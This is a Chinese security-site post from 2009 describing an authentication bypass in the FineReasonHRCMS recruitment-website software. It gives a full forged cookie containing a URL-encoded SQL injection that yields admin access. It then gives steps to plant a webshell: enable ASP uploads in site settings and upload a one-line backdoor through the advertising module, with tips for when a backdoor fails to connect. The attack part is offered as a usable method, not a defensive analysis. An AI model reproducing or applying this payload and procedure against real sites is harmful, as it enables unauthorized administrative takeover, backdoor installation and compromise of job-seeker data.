频道栏目
首页 > 安全 > 网站安全 > 正文

嘉缘人才系统漏洞

2009-09-01 08:11:53           
收藏   我要投稿

www.33as.com

程序介绍:
FineReasonHRCMS(嘉缘人才系统),
是上海嘉挚网络科技发展有限公司于2004年推出的一款基于ASP+MSSQL开发的人才网站程序,
历经5年的开发历程,现升级至6.02版,拥有20000人才网站用户,
分为免费-标准-专业-企业-豪华等系列版本
面向广大政府,企业,职介行业提供全面的人才网站建设,管理,运营一体化解决方案.
利用方法:
使用Cookies浏览器访问后台地址,默认为admin/admin_login.asp,
将Cookies修改为以下内容:
ASPSESSIONIDSAATQRTD=LJDBGAJCFECBDGJOHEEHOINN; SuperAdmin=yes; admin%5Fpass=1111111111111111111111111111111; admin%5Fname=admin%27%20and%201%3D2%20union%20all%20select%201%2C2%2C%271111111111111111111111111111111%27%2C%271%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%27%2C%27manage%27%20from%20job_admin%20where%20%271%27%3D%271; admin%5Ftype=manage; admin%5Fflag=1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10
修改后台路径为admin/admin_index.asp.
获取Webshell方法:
首先在网站配置处添加ASP文件上传类型,
然后到网站广告处添加广告,并上传一句话后门即可.
注:
貌似只能上传一句话后门,直接上传大马会提示上传文件类型不正确.
而且有些写法的一句话后门上传以后不能用连接端正常连接,
如果出现上传一句话后不能正常连接,请尝试更换其他写法的一句话后门.
附一句话后门写法大全:
/Article/200909/41193.html

相关TAG标签 漏洞 人才 系统
上一篇:Oracle SQL Injection Cheat Sheet
下一篇:设网站文件目录与数据库权限 拒绝黑客入侵
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站